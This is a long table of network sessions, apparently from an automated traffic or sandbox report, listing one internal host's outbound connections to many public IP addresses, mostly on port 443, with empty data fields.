                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13246192.168.2.233972641.81.119.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13247192.168.2.2335548184.75.120.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13248192.168.2.2334400142.125.162.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13249192.168.2.234427879.224.4.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13250192.168.2.234705698.11.162.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13251192.168.2.2340184145.127.243.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13252192.168.2.2351266114.230.108.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13253192.168.2.2358104137.106.187.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13254192.168.2.2348868104.188.12.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13255192.168.2.2344336103.144.49.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13256192.168.2.234211425.140.186.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13257192.168.2.234421042.195.55.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13258192.168.2.233493881.225.120.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13259192.168.2.2358936204.149.75.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13260192.168.2.235299048.155.15.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13261192.168.2.235605635.224.118.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13262192.168.2.2354926134.117.199.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13263192.168.2.2336432194.132.38.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13264192.168.2.234466890.38.212.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13265192.168.2.234637494.237.251.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13266192.168.2.234338034.181.3.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13267192.168.2.234057435.107.237.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13268192.168.2.2339308200.248.209.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13269192.168.2.2359880182.48.148.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13270192.168.2.2350338154.209.182.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13271192.168.2.2343768148.147.226.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13272192.168.2.2333956137.210.36.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13273192.168.2.234876627.85.126.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13274192.168.2.2353982203.96.233.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13275192.168.2.2346688199.116.41.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13276192.168.2.2338772101.195.94.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13277192.168.2.2352020117.25.141.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13278192.168.2.2358742217.4.28.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13279192.168.2.235264853.106.53.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13280192.168.2.2352116155.133.154.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13281192.168.2.2360360157.238.150.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13282192.168.2.2341710133.242.238.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13283192.168.2.2336926141.157.248.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13284192.168.2.2346518147.72.44.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13285192.168.2.2358392111.17.239.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13286192.168.2.2359020130.87.161.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13287192.168.2.234861824.198.47.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13288192.168.2.2341102152.204.51.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13289192.168.2.2358748125.107.195.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13290192.168.2.2350022179.33.247.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13291192.168.2.2354608171.105.234.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13292192.168.2.2351702204.248.151.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13293192.168.2.234872485.143.170.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13294192.168.2.2359434178.245.57.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13295192.168.2.2346294141.122.112.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13296192.168.2.234072060.158.97.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13297192.168.2.235767068.80.213.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13298192.168.2.2341592146.106.52.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13299192.168.2.2347944171.131.201.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13300192.168.2.234085059.243.192.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13301192.168.2.235450665.40.185.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13302192.168.2.235950657.216.175.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13303192.168.2.2341442112.59.219.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13304192.168.2.233972012.181.9.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13305192.168.2.233351258.107.178.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13306192.168.2.2347844191.114.86.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13307192.168.2.2352938187.237.79.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13308192.168.2.235903418.212.43.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13309192.168.2.2348872154.40.115.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13310192.168.2.233392240.96.4.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13311192.168.2.233291624.34.56.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13312192.168.2.2341792124.175.248.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13313192.168.2.2358178135.248.164.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13314192.168.2.235410238.66.84.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13315192.168.2.2338962221.111.43.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13316192.168.2.2336548217.55.181.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13317192.168.2.236097863.177.88.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13318192.168.2.2347402116.37.155.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13319192.168.2.2353054169.250.191.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13320192.168.2.2339086131.176.188.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13321192.168.2.2343294168.248.89.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13322192.168.2.235176238.28.20.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13323192.168.2.2348638143.72.251.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13324192.168.2.234684462.170.149.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13325192.168.2.235941285.222.87.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13326192.168.2.2346062104.67.240.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13327192.168.2.2339158163.78.175.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13328192.168.2.233488048.34.181.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13329192.168.2.2337754126.147.51.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13330192.168.2.2334314199.222.170.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13331192.168.2.2338492199.82.143.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13332192.168.2.2359544178.213.186.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13333192.168.2.234966280.234.27.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13334192.168.2.2340700203.58.89.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13335192.168.2.2334154113.243.87.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13336192.168.2.233435895.207.140.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13337192.168.2.235584632.134.222.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13338192.168.2.2353930185.250.21.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13339192.168.2.235905662.70.45.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13340192.168.2.2346228144.230.166.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13341192.168.2.233594481.195.183.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13342192.168.2.2347280162.1.166.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13343192.168.2.2342466102.0.124.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13344192.168.2.23569348.63.108.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13345192.168.2.235758689.67.89.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13346192.168.2.233839453.49.178.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13347192.168.2.2338518105.247.1.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13348192.168.2.233538641.194.224.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13349192.168.2.235786246.30.49.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13350192.168.2.2339388149.179.165.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13351192.168.2.2337720106.179.171.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13352192.168.2.2355560170.180.251.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13353192.168.2.2348842157.57.215.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13354192.168.2.2357444210.49.52.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13355192.168.2.2338080146.241.122.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13356192.168.2.23518968.148.252.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13357192.168.2.2345042126.83.11.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13358192.168.2.233485479.159.33.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13359192.168.2.2359160220.4.2.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13360192.168.2.235084449.37.152.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13361192.168.2.2351618167.224.195.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13362192.168.2.2340422122.123.254.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13363192.168.2.236001613.225.228.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13364192.168.2.2355432102.76.72.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13365192.168.2.234895062.217.17.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13366192.168.2.2355714207.180.203.2528080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13367192.168.2.2360792136.44.244.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13368192.168.2.2359332192.185.109.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13369192.168.2.2339590213.86.12.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13370192.168.2.2356496203.153.64.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13371192.168.2.2340126196.41.240.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13372192.168.2.235702084.168.167.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13373192.168.2.2339978117.5.187.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13374192.168.2.2352930197.54.75.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13375192.168.2.2351694124.191.209.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13376192.168.2.2340102108.148.31.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13377192.168.2.2360930111.208.192.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13378192.168.2.2338248147.50.17.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13379192.168.2.235225897.19.129.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13380192.168.2.2342702117.192.108.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13381192.168.2.235062258.196.247.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13382192.168.2.23331561.208.65.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13383192.168.2.234334664.79.62.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13384192.168.2.2338456114.29.58.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13385192.168.2.235423449.56.164.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13386192.168.2.2357964120.190.222.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13387192.168.2.233316025.134.223.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13388192.168.2.2353060164.135.239.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13389192.168.2.235207224.127.168.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13390192.168.2.2344402110.183.154.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13391192.168.2.2355810128.204.75.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13392192.168.2.234254631.208.148.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13393192.168.2.234144675.222.67.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13394192.168.2.234060445.77.240.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13395192.168.2.233867612.225.218.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13396192.168.2.236025041.253.83.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13397192.168.2.235369049.127.18.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13398192.168.2.2357978210.91.222.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13399192.168.2.2345588207.168.29.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13400192.168.2.2352740175.213.55.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13401192.168.2.2352386122.17.175.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13402192.168.2.2359314205.178.158.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13403192.168.2.2355446100.154.29.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13404192.168.2.2334826175.4.71.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13405192.168.2.234829463.78.223.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13406192.168.2.2358618212.74.250.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13407192.168.2.2344794167.169.7.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13408192.168.2.2336780193.133.172.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13409192.168.2.2343946189.129.50.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13410192.168.2.2341472200.63.193.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13411192.168.2.235806088.23.224.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13412192.168.2.23536328.71.190.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13413192.168.2.2336164210.216.104.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13414192.168.2.2348354185.227.75.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13415192.168.2.2352400141.229.239.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13416192.168.2.235468695.113.106.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13417192.168.2.2360728137.211.226.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13418192.168.2.234326277.197.38.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13419192.168.2.234668483.119.235.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13420192.168.2.234259070.31.193.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13421192.168.2.233732831.227.200.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13422192.168.2.236086862.212.23.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13423192.168.2.235825086.34.233.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13424192.168.2.2344664210.2.203.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13425192.168.2.2342602211.73.53.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13426192.168.2.234848090.98.114.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13427192.168.2.235711032.180.167.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13428192.168.2.234610260.212.249.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13429192.168.2.235396249.54.207.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13430192.168.2.234661652.23.3.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13431192.168.2.236014245.244.240.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13432192.168.2.234133669.56.60.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13433192.168.2.2340380210.181.90.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13434192.168.2.2333086153.233.127.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13435192.168.2.2344938212.169.163.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13436192.168.2.2345586182.2.74.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13437192.168.2.234307881.48.133.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13438192.168.2.234083485.145.215.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13439192.168.2.2345332216.186.22.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13440192.168.2.2347782194.75.186.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13441192.168.2.2356586167.72.199.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13442192.168.2.2357860169.254.60.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13443192.168.2.235328692.50.254.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13444192.168.2.2340678187.122.82.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13445192.168.2.235999299.233.227.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13446192.168.2.2338652172.200.199.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13447192.168.2.233647677.42.175.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13448192.168.2.2339936141.3.185.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13449192.168.2.2333732111.102.114.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13450192.168.2.233426664.31.203.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13451192.168.2.2354284175.31.139.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13452192.168.2.236071697.207.160.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13453192.168.2.23586962.187.160.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13454192.168.2.2337768193.173.141.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13455192.168.2.2342522172.143.176.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13456192.168.2.2344194162.239.110.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13457192.168.2.235968662.150.40.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13458192.168.2.2351896129.101.194.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13459192.168.2.2334758146.19.213.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13460192.168.2.234302240.121.103.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13461192.168.2.234019231.61.222.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13462192.168.2.235141236.42.190.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13463192.168.2.235819446.170.240.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13464192.168.2.2335402155.78.66.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13465192.168.2.2336008102.107.0.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13466192.168.2.2340434163.244.80.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13467192.168.2.2357326131.246.34.103443
